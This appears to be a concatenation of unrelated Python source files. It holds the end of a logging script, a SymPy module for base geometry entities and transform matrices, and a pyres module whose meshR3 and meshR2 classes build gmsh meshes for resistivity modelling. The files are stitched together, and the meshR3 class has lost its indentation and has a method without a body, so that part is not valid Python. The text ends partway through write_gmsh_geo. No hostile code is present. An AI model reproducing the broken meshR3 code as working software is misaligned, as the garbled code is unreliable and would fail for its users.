:arg verbose: When True, set log level to DEBUG.
"""
log_level = logging.DEBUG if verbose else logging.WARNING
logging.basicConfig(format='%(levelname)s: %(message)s',
level=log_level)
logging.debug('Verbose output enabled.')
# Script entry point.
if __name__ == '__main__':
    main()
|
|
"""The definition of the base geometrical entity with attributes common to
all derived geometrical entities.
Contains
========
GeometryEntity
"""
from __future__ import print_function, division
from sympy.core.compatibility import is_sequence
from sympy.core.containers import Tuple
from sympy.core.basic import Basic
from sympy.core.sympify import sympify
from sympy.functions import cos, sin
from sympy.matrices import eye
# How entities are ordered; used by __cmp__ in GeometryEntity
# (Kept in sync with GeometryEntity.__cmp__, which ranks entities by their
# index in this list.)
ordering_of_classes = [
    "Point",
    "Point3D",
    "Segment",
    "Ray",
    "Line",
    "Line3D",
    "Ray3D",
    "Segment3D",
    "Plane",
    "Triangle",
    "RegularPolygon",
    "Polygon",
    "Circle",
    "Ellipse",
    "Curve"
]
class GeometryEntity(Basic):
    """The base class for all geometrical entities.
    This class doesn't represent any particular geometric entity, it only
    provides the implementation of some methods common to all subclasses.
    """

    def __new__(cls, *args, **kwargs):
        # Normalize the arguments: sequences become Tuples, everything else
        # is run through sympify so all stored args are SymPy objects.
        args = [Tuple(*a) if is_sequence(a) else sympify(a) for a in args]
        return Basic.__new__(cls, *args)

    def _sympy_(self):
        # sympify() hook: a GeometryEntity is already a SymPy object.
        return self

    def __getnewargs__(self):
        # Pickle support: reconstruct via __new__ with the stored args.
        return tuple(self.args)

    def intersection(self, o):
        """
        Returns a list of all of the intersections of self with o.
        Notes
        =====
        An entity is not required to implement this method.
        If two different types of entities can intersect, the item with
        higher index in ordering_of_classes should implement
        intersections with anything having a lower index.
        See Also
        ========
        sympy.geometry.util.intersection
        """
        raise NotImplementedError()

    def rotate(self, angle, pt=None):
        """Rotate ``angle`` radians counterclockwise about Point ``pt``.
        The default pt is the origin, Point(0, 0)
        See Also
        ========
        scale, translate
        Examples
        ========
        >>> from sympy import Point, RegularPolygon, Polygon, pi
        >>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
        >>> t # vertex on x axis
        Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
        >>> t.rotate(pi/2) # vertex on y axis now
        Triangle(Point(0, 1), Point(-sqrt(3)/2, -1/2), Point(sqrt(3)/2, -1/2))
        """
        newargs = []
        for a in self.args:
            if isinstance(a, GeometryEntity):
                # Delegate the rotation to sub-entities (e.g. Points).
                newargs.append(a.rotate(angle, pt))
            else:
                newargs.append(a)
        return type(self)(*newargs)

    def scale(self, x=1, y=1, pt=None):
        """Scale the object by multiplying the x,y-coordinates by x and y.
        If pt is given, the scaling is done relative to that point; the
        object is shifted by -pt, scaled, and shifted by pt.
        See Also
        ========
        rotate, translate
        Examples
        ========
        >>> from sympy import RegularPolygon, Point, Polygon
        >>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
        >>> t
        Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
        >>> t.scale(2)
        Triangle(Point(2, 0), Point(-1, sqrt(3)/2), Point(-1, -sqrt(3)/2))
        >>> t.scale(2,2)
        Triangle(Point(2, 0), Point(-1, sqrt(3)), Point(-1, -sqrt(3)))
        """
        from sympy.geometry.point import Point
        if pt:
            # Conjugate the scaling by a translation that moves pt to the
            # origin and back again.
            pt = Point(pt)
            return self.translate(*(-pt).args).scale(x, y).translate(*pt.args)
        return type(self)(*[a.scale(x, y) for a in self.args])  # if this fails, override this class

    def translate(self, x=0, y=0):
        """Shift the object by adding to the x,y-coordinates the values x and y.
        See Also
        ========
        rotate, scale
        Examples
        ========
        >>> from sympy import RegularPolygon, Point, Polygon
        >>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
        >>> t
        Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
        >>> t.translate(2)
        Triangle(Point(3, 0), Point(3/2, sqrt(3)/2), Point(3/2, -sqrt(3)/2))
        >>> t.translate(2, 2)
        Triangle(Point(3, 2), Point(3/2, sqrt(3)/2 + 2),
            Point(3/2, -sqrt(3)/2 + 2))
        """
        newargs = []
        for a in self.args:
            if isinstance(a, GeometryEntity):
                newargs.append(a.translate(x, y))
            else:
                newargs.append(a)
        return self.func(*newargs)

    def reflect(self, line):
        """Reflect self across the given line."""
        from sympy import atan, Point, Dummy, oo
        g = self
        l = line
        o = Point(0, 0)
        if l.slope == 0:
            # Horizontal mirror line.
            y = l.args[0].y
            if not y:  # x-axis
                return g.scale(y=-1)
            reps = [(p, p.translate(y=2*(y - p.y))) for p in g.atoms(Point)]
        elif l.slope == oo:
            # Vertical mirror line.
            x = l.args[0].x
            if not x:  # y-axis
                return g.scale(x=-1)
            reps = [(p, p.translate(x=2*(x - p.x))) for p in g.atoms(Point)]
        else:
            if not hasattr(g, 'reflect') and not all(
                    isinstance(arg, Point) for arg in g.args):
                raise NotImplementedError(
                    'reflect undefined or non-Point args in %s' % g)
            a = atan(l.slope)
            c = l.coefficients
            d = -c[-1]/c[1]  # y-intercept
            # apply the transform to a single point
            x, y = Dummy(), Dummy()
            xf = Point(x, y)
            # Conjugate the y-flip by the rotation/translation that maps the
            # mirror line onto the x-axis.
            xf = xf.translate(y=-d).rotate(-a, o).scale(y=-1
                ).rotate(a, o).translate(y=d)
            # replace every point using that transform
            reps = [(p, xf.xreplace({x: p.x, y: p.y})) for p in g.atoms(Point)]
        return g.xreplace(dict(reps))

    def encloses(self, o):
        """
        Return True if o is inside (not on or outside) the boundaries of self.
        The object will be decomposed into Points and individual Entities need
        only define an encloses_point method for their class.
        See Also
        ========
        sympy.geometry.ellipse.Ellipse.encloses_point
        sympy.geometry.polygon.Polygon.encloses_point
        Examples
        ========
        >>> from sympy import RegularPolygon, Point, Polygon
        >>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
        >>> t2 = Polygon(*RegularPolygon(Point(0, 0), 2, 3).vertices)
        >>> t2.encloses(t)
        True
        >>> t.encloses(t2)
        False
        """
        from sympy.geometry.point import Point
        from sympy.geometry.line import Segment, Ray, Line
        from sympy.geometry.ellipse import Ellipse
        from sympy.geometry.polygon import Polygon, RegularPolygon
        if isinstance(o, Point):
            return self.encloses_point(o)
        elif isinstance(o, Segment):
            return all(self.encloses_point(x) for x in o.points)
        elif isinstance(o, Ray) or isinstance(o, Line):
            # Infinite entities can never be strictly enclosed.
            return False
        elif isinstance(o, Ellipse):
            return self.encloses_point(o.center) and not self.intersection(o)
        elif isinstance(o, Polygon):
            if isinstance(o, RegularPolygon):
                if not self.encloses_point(o.center):
                    return False
            return all(self.encloses_point(v) for v in o.vertices)
        raise NotImplementedError()

    def is_similar(self, other):
        """Is this geometrical entity similar to another geometrical entity?
        Two entities are similar if a uniform scaling (enlarging or
        shrinking) of one of the entities will allow one to obtain the other.
        Notes
        =====
        This method is not intended to be used directly but rather
        through the `are_similar` function found in util.py.
        An entity is not required to implement this method.
        If two different types of entities can be similar, it is only
        required that one of them be able to determine this.
        See Also
        ========
        scale
        """
        raise NotImplementedError()

    def equals(self, o):
        # Structural equality; subclasses may override with geometric checks.
        return self == o

    def __ne__(self, o):
        """Test inequality of two geometrical entities."""
        return not self.__eq__(o)

    # Reflected arithmetic operators: delegate to the other operand.
    def __radd__(self, a):
        return a.__add__(self)

    def __rsub__(self, a):
        return a.__sub__(self)

    def __rmul__(self, a):
        return a.__mul__(self)

    def __rdiv__(self, a):
        return a.__div__(self)

    def __str__(self):
        """String representation of a GeometryEntity."""
        from sympy.printing import sstr
        return type(self).__name__ + sstr(self.args)

    def __repr__(self):
        """String representation of a GeometryEntity that can be evaluated
        by sympy."""
        return type(self).__name__ + repr(self.args)

    def __cmp__(self, other):
        """Comparison of two GeometryEntities."""
        n1 = self.__class__.__name__
        n2 = other.__class__.__name__
        c = (n1 > n2) - (n1 < n2)
        if not c:
            return 0
        # Rank each class by its position in ordering_of_classes, walking the
        # MRO so subclasses inherit the position of a listed ancestor.
        i1 = -1
        for cls in self.__class__.__mro__:
            try:
                i1 = ordering_of_classes.index(cls.__name__)
                break
            except ValueError:
                i1 = -1
        if i1 == -1:
            # Unlisted classes fall back to plain name ordering.
            return c
        i2 = -1
        for cls in other.__class__.__mro__:
            try:
                i2 = ordering_of_classes.index(cls.__name__)
                break
            except ValueError:
                i2 = -1
        if i2 == -1:
            return c
        return (i1 > i2) - (i1 < i2)

    def __contains__(self, other):
        """Subclasses should implement this method for anything more complex than equality."""
        if type(self) == type(other):
            return self == other
        raise NotImplementedError()

    def _eval_subs(self, old, new):
        from sympy.geometry.point import Point
        from sympy.geometry.point3d import Point3D
        if is_sequence(old) or is_sequence(new):
            # Promote coordinate sequences to Points of the matching
            # dimension before performing the substitution.
            if isinstance(self, Point3D):
                old = Point3D(old)
                new = Point3D(new)
            else:
                old = Point(old)
                new = Point(new)
            return self._subs(old, new)
def translate(x, y):
    """Return the matrix to translate a 2-D point by x and y."""
    mat = eye(3)
    mat[2, 0], mat[2, 1] = x, y
    return mat
def scale(x, y, pt=None):
    """Return the matrix to multiply a 2-D point's coordinates by x and y.
    If pt is given, the scaling is done relative to that point."""
    mat = eye(3)
    mat[0, 0] = x
    mat[1, 1] = y
    if not pt:
        return mat
    # Conjugate the scaling by translations that move pt to the origin
    # and back again.
    from sympy.geometry.point import Point
    anchor = Point(pt)
    to_origin = translate(*(-anchor).args)
    from_origin = translate(*anchor.args)
    return to_origin*mat*from_origin
def rotate(th):
    """Return the matrix to rotate a 2-D point about the origin by ``th``.
    The angle is measured in radians. To rotate a point about a point other
    than the origin, translate the Point, do the rotation, and
    translate it back:
    >>> from sympy.geometry.entity import rotate, translate
    >>> from sympy import Point, pi
    >>> rot_about_11 = translate(-1, -1)*rotate(pi/2)*translate(1, 1)
    >>> Point(1, 1).transform(rot_about_11)
    Point(1, 1)
    >>> Point(0, 0).transform(rot_about_11)
    Point(2, 0)
    """
    s = sin(th)
    # eye(3)*cos(th) fills the diagonal with cos(th); the off-diagonal sine
    # terms and the homogeneous 1 are patched in below.
    rv = eye(3)*cos(th)
    rv[0, 1] = s
    rv[1, 0] = -s
    rv[2, 2] = 1
    return rv
|
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 31 09:50:23 2017
@author: kbefus
"""
from __future__ import print_function
import numpy as np
import time, os
from pyres import pyres_utils,mesh_utils
class meshR3(object):
def __init__(self,geom_dict=None,name=None,nelectrodes_per_line=None,
nlines=None):
self.name = name
self.nelectrodes_per_line = nelectrodes_per_line
self.nlines = nlines
def make_points(self, line_strexyz=None, clen=0.1,start_pts=1):
'''Make point dictionary.'''
if line_strexyz is None:
# Make line data using default line settings
self.make_strxyz()
else:
self.line_strexyz = line_strexyz
if not hasattr(self,'points'):
self.points = {}
mesh_utils.make_points(self,clen,start_pts,ndim=3)
def make_lines(self,start_lines=1):
mesh_utils.make_lines(self,start_lines)
def make_boundaries(self,nforeground=4,nbackground=4):
'''Make boundaries from survey bounds.
Can eventually add capability to define non-square boundaries
'''
mesh_utils.make_boundaries(self,nforeground,nbackground)
def make_surfaces(self):
mesh_utils.make_surfaces(self,ndim=3)
def make_regions(self, region_xyzpts=None, extend_to=None,
clen=None, boundary_dict=None,region_fname=None,load_dict=None,
outside_foreground=False,active_domain='foreground'):
'''Create geometry components for assigning model region.'''
def write_geo(self,out_fname=None,boundary_dict=None,extrude_dict=None,ndigits=2):
'''Write .geo file.
'''
gmsh_geo_dict = {'gmsh_obj':self,'out_fname':out_fname,
'boundary_dict':boundary_dict,
'extrude_dict':extrude_dict,
'ndigits':ndigits}
write_gmsh_geo(**gmsh_geo_dict)
self.geo_name = out_fname
def run_gmsh(self,silent=True,report=True,
gmshdir = r'D:\Research\Software\gmsh-2.16.0-Windows',
gmshexe = 'gmsh.exe',optimize=False, num_quad_lloyd_steps=0, dim=3,
normal_msg = 'stopped on'):
'''Run gmsh executable.
Source: after https://github.com/nschloe/pygmsh/blob/master/pygmsh/helper.py#generate_mesh
'''
cwd = os.path.dirname(self.geo_name)
cmd_list = [os.path.join(gmshdir,gmshexe), '-{0:d}'.format(dim), self.geo_name, '-o', self.msh_name]
if optimize:
cmd_list += ['-optimize']
if num_quad_lloyd_steps > 0:
cmd_list += ['-optimize_lloyd', str(num_quad_lloyd_steps)]
run_dict = {'cmd_list':cmd_list,'cwd':cwd,'silent':silent,
'normal_msg':normal_msg,'report':report}
self.success,self.buff = pyres_utils.run_cmd(**run_dict)
def locate_inf_electrode(self,inf_electrode_xy=[None,None],
msh_name=None):
'''Find mesh node of inf electrode(s).'''
if hasattr(self,'msh_name'):
# Load .msh file
msh_dict = read_gmsh(msh_fname=self.msh_name)
elif msh_name is not None:
msh_dict = read_gmsh(msh_fname=msh_name)
else:
print("msh_name needs to be assigned.")
# Find closest node to infinity electrode
# 1) Try to find perfect match
match_inds = pyres_utils.match_xy(XY=msh_dict['nodes'][:,0:2],
xy_to_match = np.array(inf_electrode_xy))
if len(match_inds)<1.:
dist_array = np.sqrt((inf_electrode_xy[0]-msh_dict['nodes'][:,0])**2.+\
(inf_electrode_xy[1]-msh_dict['nodes'][:,1])**2.)
match_ind = np.argmin(dist_array)+1 # account for 1-based indexing
return match_ind,msh_dict['nodes'][match_ind,:]
def msh_to_dat(self,msh_fname=None,out_file='mesh3d.dat', topo_correct=False,
        topo_dict=None, overwrite=True, verbose=False, job_type=1,
        alpha_scale=1.):
    '''Convert a gmsh .msh file to an R3 mesh3d.dat file.

    Results from gmsh_to_R3 (message, number of regions, mesh dictionary,
    topography array) are stored on the object.
    '''
    # Default to the mesh produced by run_gmsh.
    if msh_fname is None:
        msh_fname = self.msh_name
    outputs = gmsh_to_R3(msh_fname=msh_fname,
                         out_file=out_file,
                         topo_correct=topo_correct,
                         topo_dict=topo_dict,
                         overwrite=overwrite,
                         verbose=verbose,
                         job_type=job_type,
                         alpha_scale=alpha_scale)
    self.gmsh_to_R3_msg,self.nregions,self.mesh_dict,self.topo_xyz = outputs
def make_mesh(self,geom_dict=None,write_dict=None,
        run_gmsh=False, gmsh_dict=None,region_dict=None):
    '''Build the full mesh: geometry, .geo file, and (optionally) gmsh run.
    '''
    # Geometry construction, in dependency order.
    self.make_points(**geom_dict)
    self.make_lines()
    self.make_boundaries()
    self.make_surfaces()
    if region_dict is not None:
        self.make_regions(**region_dict)
        # Let write_geo know about the regions as well.
        write_dict['region_dict'] = region_dict
    self.write_geo(**write_dict)
    if not run_gmsh:
        return
    # Name the .msh after the .geo file and run gmsh on it.
    self.msh_name = "{}.msh".format(os.path.splitext(self.geo_name)[0])
    if gmsh_dict is not None:
        self.run_gmsh(**gmsh_dict)
    else:
        self.run_gmsh()
class meshR2(object):
    '''Builder for a 2D gmsh geometry/mesh used by R2.

    Workflow (see make_mesh): make_points -> make_lines ->
    make_boundaries -> make_surfaces [-> make_regions] -> write_geo
    [-> run_gmsh] -> msh_to_dat. Geometry entities are stored in
    dictionaries keyed by integer gmsh entity numbers; each dictionary
    carries an 'order' key recording creation order.
    '''
    def __init__(self,geom_dict=None,name=None,nelectrodes_per_line=None,
                 nlines=1,electrode_spacing=None):
        # NOTE(review): geom_dict is accepted but not stored or used here;
        # geometry options are instead passed to make_mesh/make_points.
        self.name = name
        self.nelectrodes_per_line = nelectrodes_per_line
        self.nlines = nlines
        self.electrode_spacing = electrode_spacing
    def make_strxyz(self):
        '''Make 2D line string, electrode number, x, y, z array.
        Note: Assumes all electrodes at surface (z=0) and are on the
        y-axis (y=0).
        '''
        # Columns: line number (all ones), electrode number (0-based),
        # x (electrode_spacing increments), y (zeros), z (zeros).
        self.line_strexyz = np.array([np.hstack([np.ones((self.nelectrodes_per_line,1)),
                                     np.arange(self.nelectrodes_per_line).reshape([-1,1]),
                                     self.electrode_spacing*np.arange(self.nelectrodes_per_line).reshape([-1,1]),
                                     np.zeros((self.nelectrodes_per_line,1)),
                                     np.zeros((self.nelectrodes_per_line,1))])])
    def make_points(self, line_strexyz=None, clen=0.1,start_pts=1):
        '''Make point dictionary.

        Each electrode becomes a gmsh Point numbered consecutively from
        start_pts with characteristic length clen. Electrode/point-number
        pairs are collected in self.electrode_array for protocol.dat.
        '''
        if line_strexyz is None:
            # Make line data using default line settings
            self.make_strxyz()
        else:
            self.line_strexyz = line_strexyz
        if not hasattr(self,'points'):
            self.points = {}
        elec_list = []
        iline_order = []
        for iline in np.arange(self.line_strexyz.shape[0]):
            if iline not in self.points.keys():
                self.points[iline] = {}
            iline_order.append(iline)
            key_order = []
            for linestr,enum,x,y,z in self.line_strexyz[iline]:
                self.points[iline].update({start_pts:[x,y,z,clen]})
                key_order.append(start_pts)
                elec_list.append([enum,start_pts]) # save data for protocol.dat
                start_pts+=1
            self.points[iline].update({'order':key_order})
        self.points.update({'order':iline_order})
        # Next unused point number (running 1-based counter).
        self.count_pts = start_pts
        self.electrode_array = np.array(elec_list)
    def make_lines(self,start_lines=1):
        '''Connect consecutive electrode points into gmsh Lines.'''
        self.start_lines=start_lines
        self.lines = {}
        self.surveyline_startend = {}
        self.startpt,self.endpt = [],[]
        key_order_se = []
        for ikey in self.points['order']:
            # Collect consecutive points into lines in reverse order
            line_keys = self.points[ikey]['order']
            # record start and end positions of line
            self.startpt.append(line_keys[0])
            self.endpt.append(line_keys[-1])
            # Save first line in section
            self.surveyline_startend[ikey] = [self.start_lines]
            key_order_se.append(ikey)
            key_order = []
            for istart,iend in zip(line_keys[:-1],line_keys[1:]):
                self.lines.update({self.start_lines:[istart,iend]})
                key_order.append(self.start_lines)
                self.start_lines+=1
            # NOTE(review): 'order' is overwritten each outer iteration, so
            # for multi-line surveys only the last survey line's segments
            # remain in lines['order'] (plus connectors appended below).
            self.lines.update({'order':key_order})
            # Save last line in section
            self.surveyline_startend[ikey].append(self.start_lines-1)
        self.surveyline_startend.update({'order':key_order_se})
        # Connectors for the lines
        if len(self.startpt)>1:
            for istart1,istart2 in zip(self.startpt[:-1],self.startpt[1:]):
                self.lines.update({self.start_lines:[istart1,istart2]})
                self.lines['order'].append(self.start_lines)
                self.start_lines+=1
            for end1,iend2 in zip(self.endpt[:-1],self.endpt[1:]):
                self.lines.update({self.start_lines:[end1,iend2]})
                self.lines['order'].append(self.start_lines)
                self.start_lines+=1
    def make_boundaries(self,nforeground=4,nbackground=4):
        '''Make boundaries from survey bounds.
        Can eventually add capability to define non-square boundaries
        '''
        self.boundaries = {}
        # First make foreground boundaries by extending some constant beyond
        # the corner points
        fore_corners = np.arange(self.count_pts,self.count_pts+nforeground)
        self.count_pts = self.count_pts+nforeground
        # Pair each corner point with the next (wrapping around).
        fore_pairs = np.c_[fore_corners,np.roll(fore_corners,-1)]
        self.boundaries['foreground'] = {}
        self.boundaries['foreground'].update(self.lines.copy())
        key_order = []
        key_order.extend(self.lines['order'])
        self.boundaries['foreground'].update({self.start_lines:[self.endpt[0],fore_pairs[-1,1]]})
        key_order.append(self.start_lines)
        self.start_lines += 1
        self.fore_lines=[]
        for ifore in np.arange(nforeground-1):
            self.boundaries['foreground'].update({self.start_lines:
                fore_pairs[ifore,:].tolist()})
            key_order.append(self.start_lines)
            self.fore_lines.append(self.start_lines)
            self.start_lines += 1
        self.boundaries['foreground'].update({self.start_lines:[fore_pairs[-1,0],self.startpt[0]]})
        key_order.append(self.start_lines)
        self.boundaries['foreground'].update({'order':key_order})
        self.start_lines += 1
        # Background points and lines
        back_corners = np.arange(self.count_pts,self.count_pts+nbackground)
        self.count_pts = self.count_pts + nbackground
        back_pairs = np.c_[back_corners,np.roll(back_corners,-1)]
        key_order = []
        self.boundaries['background'] = {}
        self.boundaries['background'].update({self.start_lines:[fore_pairs[0,0],back_pairs[0,0]]})
        key_order.append(self.start_lines)
        self.start_lines += 1
        for iback in np.arange(nbackground-1):
            self.boundaries['background'].update({self.start_lines:
                back_pairs[iback,:].tolist()})
            key_order.append(self.start_lines)
            self.start_lines += 1
        self.boundaries['background'].update({self.start_lines:[back_pairs[-1,0],fore_pairs[-1,0]]})
        key_order.append(self.start_lines)
        self.boundaries['background'].update({'order':key_order})
        self.start_lines += 1
    def make_surfaces(self):
        '''Build gmsh Line Loops and Plane Surfaces for fore/background.'''
        self.surfaces = {}
        seg_dict = {'nelectrodes':self.nelectrodes_per_line,
                    'nlines':self.nlines,
                    'topbot':True,
                    'iline':np.arange(2*(self.nlines-1))}
        self.connecting_segs = mesh_utils.segment_loc(**seg_dict).reshape((2,-1)).T
        self.surflines = {} # will have "Line Loop(#) = {}
        key_order_sl = []
        key_order_s = []
        # Make bounding foreground surface from foreground lines and line-bounding lines
        self.surflines.update({self.start_lines:np.roll(self.boundaries['foreground']['order'],1).tolist()}) # foreground boundary
        key_order_sl.append(self.start_lines)
        self.start_lines += 1
        self.surfaces.update({self.start_lines:[self.start_lines-1]})
        key_order_s.append(self.start_lines)
        self.start_lines += 1
        # Make background surface between foreground and background lines
        # (negative line numbers reverse traversal direction in gmsh).
        foreline_order = -1*np.array(self.fore_lines)[::-1]
        background_order = np.hstack([foreline_order,self.boundaries['background']['order']])
        self.surflines.update({self.start_lines:background_order.tolist()}) # background line
        key_order_sl.append(self.start_lines)
        self.surflines.update({'order':key_order_sl})
        self.start_lines += 1
        self.surfaces.update({self.start_lines:[self.start_lines-1]})
        key_order_s.append(self.start_lines)
        self.surfaces.update({'order':key_order_s})
    def make_regions(self, region_xyzpts=None, extend_to=None,
                     clen=None, boundary_dict=None,region_fname=None,load_dict=None,
                     outside_foreground=False,active_domain='foreground'):
        '''Create geometry components for assigning model region.

        Region outlines come either from region_xyzpts (array(s) of x,y[,z]
        vertices) or from the delimited file(s) in region_fname. Results are
        stored in self.region_dict and the boundary/surfline dictionaries
        are replaced with the updated versions from mesh_utils.make_region.
        '''
        # ----------------- Load region data ---------------------------
        if region_fname is not None:
            region_xyzpts=[]
            for region_temp in region_fname:
                region_xyz_temp,header_info = load_delim(region_temp,**load_dict)
                if region_xyz_temp.shape[-1]<3:
                    # Pad missing elevation column with zeros.
                    region_xyz_temp = np.hstack([region_xyz_temp,np.zeros((region_xyz_temp.shape[0],1))])
                region_xyzpts.append(region_xyz_temp)
        if isinstance(region_xyzpts,(list,tuple)):
            try:
                region_xyzpts = np.array(region_xyzpts)
            except:
                # NOTE(review): bare except preserved; ragged region lists
                # fall through and are used as a list of arrays.
                print("Could not convert region_xyzpts to np.ndarray...Assuming it is a list of region arrays")
        if isinstance(region_xyzpts,np.ndarray):
            # Fill elevation, z, column with zeros if not existing
            if region_xyzpts.shape[-1]<3:
                region_xyzpts = np.hstack([region_xyzpts,np.zeros((region_xyzpts.shape[0],1))])
            if len(region_xyzpts.shape)<3:
                # Stack regions into 3rd dimension
                region_xyzpts = [region_xyzpts]
        self.region_xyzpts = region_xyzpts
        # -------------- Make region geometry components ---------------------
        self.region_dict = {}
        # NOTE(review): iregion_count is never incremented, so multiple
        # regions (or the foreground pre-pass below) all write to key 0
        # and 'order' repeats 0 -- confirm intended for >1 region.
        iregion_count = 0
        for iregion_xyzpts in self.region_xyzpts:
            if active_domain in ['foreground'] and extend_to in ['background']:
                # First create a region in the foreground that will then be
                # extended into the background as well
                geom_dict = {'points':self.points.copy(),
                             'boundaries':self.boundaries.copy(),
                             'surflines':self.surflines.copy(),
                             'fore_lines':self.fore_lines}
                # Find xyz points inside foreground
                foreground_bounds,foreground_bool = mesh_utils.calc_region_bounds(region='foreground',
                                                        geom_dict=geom_dict,
                                                        xyz = iregion_xyzpts)
                ipts_foreground = iregion_xyzpts[foreground_bool,:].copy()
                ipts_background = iregion_xyzpts[~foreground_bool,:].copy()
                iregion_xyzpts = ipts_background.copy() # replace with only pts in background region
                make_region_dict = {'geom_dict':geom_dict,
                                    'start_line_num':self.start_lines,
                                    'start_pt_num':self.count_pts,
                                    'extend_to':'foreground',
                                    'region_xyzpts':ipts_foreground,
                                    'boundary_dict':boundary_dict,
                                    'clen':clen,
                                    'active_domain':active_domain}
                region_out_dict,self.start_lines,self.count_pts = mesh_utils.make_region(**make_region_dict)
                self.region_dict.update({iregion_count:region_out_dict['region_dict']})
                self.boundaries = region_out_dict['boundaries'].copy()
                self.surflines = region_out_dict['surflines'].copy()
                active_domain = 'background' # overwrite to make background region
                # Update region order
                if 'order' not in self.region_dict.keys():
                    self.region_dict.update({'order':[iregion_count]})
                else:
                    self.region_dict['order'].append(iregion_count)
            # Create region in "active_domain"
            geom_dict = {'points':self.points.copy(),
                         'boundaries':self.boundaries.copy(),
                         'surflines':self.surflines.copy(),
                         'fore_lines':self.fore_lines}
            make_region_dict = {'geom_dict':geom_dict,
                                'start_line_num':self.start_lines,
                                'start_pt_num':self.count_pts,
                                'extend_to':extend_to,
                                'region_xyzpts':iregion_xyzpts,
                                'boundary_dict':boundary_dict,
                                'clen':clen,
                                'active_domain':active_domain}
            region_out_dict,self.start_lines,self.count_pts = mesh_utils.make_region(**make_region_dict)
            self.region_dict.update({iregion_count:region_out_dict['region_dict']})
            self.boundaries = region_out_dict['boundaries'].copy()
            self.surflines = region_out_dict['surflines'].copy()
            # Update region order
            if 'order' not in self.region_dict.keys():
                self.region_dict.update({'order':[iregion_count]})
            else:
                self.region_dict['order'].append(iregion_count)
    def write_geo(self,out_fname=None,boundary_dict=None,extrude_dict=None,ndigits=2,
                  region_dict=None):
        '''Write .geo file.

        Serializes this object's geometry through write_gmsh_geo with
        mesh_dim=2 and records the path in self.geo_name.
        '''
        gmsh_geo_dict = {'gmsh_obj':self,'out_fname':out_fname,
                         'boundary_dict':boundary_dict,
                         'extrude_dict':extrude_dict,
                         'ndigits':ndigits,'mesh_dim':2,
                         'region_dict':region_dict}
        write_gmsh_geo(**gmsh_geo_dict)
        self.geo_name = out_fname
    def run_gmsh(self,silent=True,report=True,
                 gmshdir = r'D:\Research\Software\gmsh-2.16.0-Windows',
                 gmshexe = 'gmsh.exe',optimize=False, num_quad_lloyd_steps=0, dim=3,
                 normal_msg = 'stopped on'):
        '''Run gmsh executable.
        Source: after https://github.com/nschloe/pygmsh/blob/master/pygmsh/helper.py#generate_mesh
        '''
        # Run from the .geo file's directory; output goes to self.msh_name.
        cwd = os.path.dirname(self.geo_name)
        cmd_list = [os.path.join(gmshdir,gmshexe), '-{0:d}'.format(dim), self.geo_name, '-o', self.msh_name]
        if optimize:
            cmd_list += ['-optimize']
        if num_quad_lloyd_steps > 0:
            cmd_list += ['-optimize_lloyd', str(num_quad_lloyd_steps)]
        run_dict = {'cmd_list':cmd_list,'cwd':cwd,'silent':silent,
                    'normal_msg':normal_msg,'report':report}
        self.success,self.buff = pyres_utils.run_cmd(**run_dict)
    def locate_inf_electrode(self,inf_electrode_xy=[None,None],
                             msh_name=None):
        '''Find mesh node of inf electrode(s).'''
        # NOTE(review): if neither self.msh_name nor msh_name is available,
        # msh_dict below is undefined (NameError); likewise, when an exact
        # match IS found, match_ind is never assigned (NameError). Also note
        # the mutable default argument for inf_electrode_xy.
        if hasattr(self,'msh_name'):
            # Load .msh file
            msh_dict = read_gmsh(msh_fname=self.msh_name)
        elif msh_name is not None:
            msh_dict = read_gmsh(msh_fname=msh_name)
        else:
            print("msh_name needs to be assigned.")
        # Find closest node to infinity electrode
        # 1) Try to find perfect match
        match_inds = pyres_utils.match_xy(XY=msh_dict['nodes'][:,0:2],
                            xy_to_match = np.array(inf_electrode_xy))
        if len(match_inds)<1.:
            dist_array = np.sqrt((inf_electrode_xy[0]-msh_dict['nodes'][:,0])**2.+\
                                 (inf_electrode_xy[1]-msh_dict['nodes'][:,1])**2.)
            match_ind = np.argmin(dist_array)+1 # account for 1-based indexing
        return match_ind,msh_dict['nodes'][match_ind,:]
    def msh_to_dat(self,msh_fname=None,out_file='mesh.dat', topo_correct=False,
                   topo_dict=None, overwrite=True, verbose=False, job_type=1,
                   alpha_scale=1.,node_zones=None,param_zones=None):
        '''Convert .msh to .dat for R2.'''
        # Default to the mesh produced by run_gmsh.
        if msh_fname is None:
            msh_fname = self.msh_name
        gmsh_to_R2_dict= {'msh_fname':msh_fname,'out_file':out_file,
                          'topo_correct':topo_correct,'topo_dict':topo_dict,
                          'overwrite':overwrite,'verbose':verbose,
                          'alpha_scale':alpha_scale,
                          'node_zones':node_zones,'param_zones':param_zones}
        self.gmsh_to_R2_msg,self.nregions, self.mesh_dict,self.topo_xyz = gmsh_to_R2(**gmsh_to_R2_dict)
    def make_mesh(self,geom_dict=None,write_dict=None,
                  run_gmsh=False, gmsh_dict=None,
                  region_dict=None):
        '''Run individual functions to make mesh.
        '''
        # Geometry construction, in dependency order.
        self.make_points(**geom_dict)
        self.make_lines()
        self.make_boundaries()
        self.make_surfaces()
        if region_dict is not None:
            self.make_regions(**region_dict)
            write_dict.update({'region_dict':region_dict})
        self.write_geo(**write_dict)
        if run_gmsh:
            # Name the .msh after the .geo file and run gmsh on it.
            self.msh_name = "{}.msh".format(os.path.splitext(self.geo_name)[0])
            if gmsh_dict is None:
                self.run_gmsh()
            else:
                self.run_gmsh(**gmsh_dict)
#%% ------------------ Utilities ------------------
def write_gmsh_geo(gmsh_obj=None,out_fname=None,boundary_dict=None,
                   extrude_dict=None,ndigits=2,mesh_dim=3,region_dict=None):
    '''Write gmsh .geo file.

    Serializes the geometry stored on gmsh_obj (points, lines, boundaries,
    surfaces, and optional gmsh_obj.region_dict) to a gmsh .geo script at
    out_fname. mesh_dim selects the 2D (R2) or 3D/extruded (R3) layout.

    NOTE(review): the region_dict parameter is accepted but not referenced
    in this body; region geometry is taken from gmsh_obj.region_dict.
    '''
    if extrude_dict is None and mesh_dim==3:
        mesh_dim = 2
    # Keep track of written geometries
    all_pts = []
    all_lines = []
